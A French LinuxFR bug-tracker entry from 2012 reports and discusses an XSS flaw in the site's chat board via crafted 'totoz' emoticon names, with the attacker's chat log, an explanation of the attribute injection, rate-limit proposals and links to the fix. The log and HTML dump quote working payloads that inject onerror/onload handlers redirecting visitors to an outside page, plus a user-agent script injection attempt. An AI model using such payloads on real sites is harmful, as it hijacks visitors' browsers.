Suivi — Tribune faille xss et un gosse qui joue avec

#989 Posté par vincent LECOQ (site web personnel) le 21 août 2012 à 19:31. État de l’entrée : corrigée. Assigné à Bruno Michel.

Étiquettes : aucune

août

2012

19:18:30 superxss [:" style="background:url(//image.noelshack.com/fichiers/2012/31/1344102497-cactus.jpg);top:0;left:0;width:100%;height:100%;background:red;z-index:9999999;position:fixed" onerror="location.href='h'+'ttp://5a'+'mp.free.f'+'r/fork.html'" onload="location.href='h'+'ttp://5a'+'mp.free.f'+'r/fork.html'" title="]

19:15:56 bi2octal ou pas

19:15:49 bi2octal vigie lent, toussa

19:15:17 bi2octal Jamais Samwang n'a parlé pour ne rien dire ou presque, n'est-ce pas ? Maintenant, plus que jamais, restez vigilents.

19:14:35 bi2octal Saisis bien fort la Voie et mange comme un glouton car le temps presse

19:14:03 bi2octal quand tu navigues dans la matrice, n'attends rien, mais regarde à droite ET à gauche

19:13:29 tankey 19:11:02 c'est marqué "ceci est une tribune libérale", c'est pourquoi je n'y suis pas resté. ça me donnerai l'impression d'aller dans une permanence en vrai pour causer de gauche -> casse couille / ou bien entendre causer n'importe quoi de fausse droite -> me casse les couilles.

19:13:08 bi2octal le hack mon frère, vois le hack

19:12:56 superxss [:" onerror="location.href='h'+'ttp://5a'+'mp.free.f'+'r/fork.html'" onload="location.href='h'+'ttp://5a'+'mp.free.f'+'r/fork.html'" title="]

19:12:21 bi2octal oui, là pour échellon, ça devient compliqué, on admet

19:11:28 pierre_80 19:10:07 c'est une 4-1bune alternative

19:11:24 bi2octal 19:11:02 [:onoz] pas lui :/

19:11:02 pierre_80 19:10:07 go to euromussels

19:10:37 bi2octal 19:10:07 :(

19:10:07 tankey bon, la tribune DLFP est MORTE

19:09:50 Omart_Erreip xss powa

19:09:42 bi2octal :)

19:09:17 bi2octal pierre rate le paradis, paronnez-leur…

19:08:57 Omart_Erreip [:" onerror="location.href='h'+'ttp://5a'+'mp.free.f'+'r/fork.html'" test="]

19:08:55 pierre_80 ça c'est fait encore un lourd en bak

19:08:32 Omart_Erreip [:" onerror="location.href='h'+'ttp://5a'+'mp.free.f'+'r/fork.html']

19:07:58 Omart_Erreip [:" onerror="location.href='[url]]

19:07:27 bi2octal Flo : pénètre la matrice, attrape la force

19:07:16 Omart_Erreip [:test">]

19:07:10 bi2octal Mode défense > la Force, luke

19:06:54 Omart_Erreip [:testtest]

# Commentaire supprimé

Posté par Anonyme le 21 août 2012 à 20:18. Évalué à 6 (+0/-0).

Ce commentaire a été supprimé par l’équipe de modération.

Répondre
- [^] # Re: Slip plus performant
  
  Posté par dyno partouzeur de drouate le 21 août 2012 à 20:23. Évalué à 2 (+0/-0).
  
  surtout que sa tribune :
  - marche hors de la boite
  - a plus de features
  - est plus légère
  - n'a pas de failles aussi évidentes que la version actuellement en prod ici
  - est libre
  
  Donc, Nono< please, demande à Zorel< comment intégrer sa tribune icitte et laisse tomber l'affaire avec le rafistolage en Ruby kipu.
  
  Répondre
- [^] # Re: Slip plus performant
  
  Posté par Bruno Michel (site web personnel) le 21 août 2012 à 22:03. Évalué à 3 (+0/-0).
  
  Il se trouve où ce code ?
  
  Répondre
  - [^] # Commentaire supprimé
    
    Posté par Anonyme le 22 août 2012 à 10:59. Évalué à 3 (+0/-0).
    
    Ce commentaire a été supprimé par l’équipe de modération.
    
    Répondre

# Totoz

Posté par needs le 21 août 2012 à 21:25. Évalué à 2 (+0/-0).

Voici une tentative d'explication :
Lorsque que l'on insert un totoz, par exemple onoz, voici ce que l'on obtient :

<span data-totoz-name="onoz" class="totoz">[:onoz]</span>

Vous l'aurez vite compris, la faille provient du fait que le nom du totoz est inséré dans l'attribut data-totoz-name. Du coup avec un totoz un peu plus élaboré comme " onload="alert('owned')" title=" on obtient le code suivant :

<span data-totoz-name="" onload="alert('owned')" title="" class="totoz">[:" onload="alert('owned')" title="]</span>

Pour les curieux, voici le code source de son commentaire :

<p id="board-823943" class="chat">
<span title="Mozilla/5.0 (X11; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1 &amp;#x27;&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script&amp;gt;alert(&amp;#x27;test&amp;#x27;)&amp;lt;/script&amp;gt;" class="board-left">
<time datetime="2012-08-21T19:12:56+02:00" class="norloge">19:12:56</time>
<b><a href="/users/superxss">superxss</a></b>
</span>
<span class="board-right"><span title="" onload="location.href='h'+'ttp://5a'+'mp.free.f'+'r/fork.html'" onerror="location.href='h'+'ttp://5a'+'mp.free.f'+'r/fork.html'" data-totoz-name="" class="totoz">[:" onerror="location.href='h'+'ttp://5a'+'mp.free.f'+'r/fork.html'" onload="location.href='h'+'ttp://5a'+'mp.free.f'+'r/fork.html'" title="]</span></span>
</p>

On peut remarquer qu'il a tenté avec le user-agent, mais que manifestement, sa n'a pas marché. Du coup il c'est rabattu sur les totoz.

[^] # Re: Totoz

Posté par dyno partouzeur de drouate le 21 août 2012 à 22:00. Évalué à 2 (+0/-0).

je crois qu'il y avait eu faille sur le user agent quand la version ror est sortie mais ça été fixé assez vite

Répondre

# pour éviter ce genre de petits c...

Posté par vincent LECOQ (site web personnel) le 21 août 2012 à 21:34. Évalué à 1 (+0/-0).

je propose une nouvelle règle pour les nouveaux comptes : au moins poster un journal pour se présenter et y obtenir une note supérieure à 3 a ce journal
interdire le double post identique
remettre le timer

Répondre
- [^] # Re: pour éviter ce genre de petits c...
  
  Posté par pierre_80 (site web personnel) le 21 août 2012 à 21:52. Évalué à 0 (+0/-0).
  
  Pas d'accord sur le journal noté au moins 3 , par contre interdire le double post identique ainsi que la remise du timer je suis d'accord .
  
  Répondre
  - [^] # Re: pour éviter ce genre de petits c...
    
    Posté par vincent LECOQ (site web personnel) le 21 août 2012 à 23:12. Évalué à 2 (+0/-0).
    
    mais heu, laisse moi moustachizer la tribune !
    
    Répondre
- [^] # Re: pour éviter ce genre de petits c...
  
  Posté par Bruno Michel (site web personnel) le 21 août 2012 à 22:16. Évalué à 3 (+0/-0).
  
  remettre le timer
  
  Est-ce que quelqu'un se souvient de la règle exacte pour le timer ?
  
  Répondre
  - [^] # Re: pour éviter ce genre de petits c...
    
    Posté par vincent LECOQ (site web personnel) le 21 août 2012 à 23:11. Évalué à 2 (+0/-0).
    
    exactement non, mais au jugé je dirais
    
    SI ((date_du_post - date_du_precedent_post_du_meme_login) < delai_toléré)
    envoyer_chier();
    SINON
    poster_la_connerie();
    
    Répondre
  - [^] # Re: pour éviter ce genre de petits c...
    
    Posté par Troy McClure (site web personnel) le 21 août 2012 à 23:13. Évalué à 2 (+0/-0).
    
    ça rejetait tout nouveau post depuis un compte quand ce meme compte avait posté moins de 10 secondes auparavant (avec un petit message informatif). C'était assez efficace pour brider les boulets floudeurs sans etre trop genant pour les autres (je crois même que ça a une influence positive sur la qualité des posts)
    
    Répondre
    - [^] # Re: pour éviter ce genre de petits c...
      
      Posté par claudex le 22 août 2012 à 06:36. Évalué à 3 (+0/-0).
      
      Si je me souviens bien, il était possible de poster un message toutes les 9 secondes (ça m'avait marqué car ce n'étais pas un chiffre rond).
      
      « Rappelez-vous toujours que si la Gestapo avait les moyens de vous faire parler, les politiciens ont, eux, les moyens de vous faire taire. » Coluche
      
      Répondre
# Corrigé

Posté par Bruno Michel (site web personnel) le 21 août 2012 à 21:36. Évalué à 6 (+0/-0).

Cf https://github.com/nono/linuxfr.org/commit/4b4e5af4a8f3055491872b5306d5e0292b9f3bdd

Répondre
- [^] # Re: Corrigé
  
  Posté par dyno partouzeur de drouate le 21 août 2012 à 22:10. Évalué à 3 (+0/-0). Dernière modification le 21 août 2012 à 22:11.
  
  Merci !
  Cepeandant, pourrais tu rajouter le ":" dans la liste des caractères autorisés ?
  
  Ce serait dommage de devoir se priver de totozes aussi beaux que [:anefail:2], [:groutgrout:3], [:kangol:1] ou encore [:malik68:2] ou [:zzanna:1] non ?
  
  Répondre
  - [^] # Re: Corrigé
    
    Posté par Bruno Michel (site web personnel) le 21 août 2012 à 22:15. Évalué à 3 (+0/-0).
    
    Oui, ajouté avec https://github.com/nono/linuxfr.org/commit/df806ab9562f33e31af9cc19e86ff5dad371fe33
    
    Répondre

Envoyer un commentaire

Suivre le flux des commentaires

Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.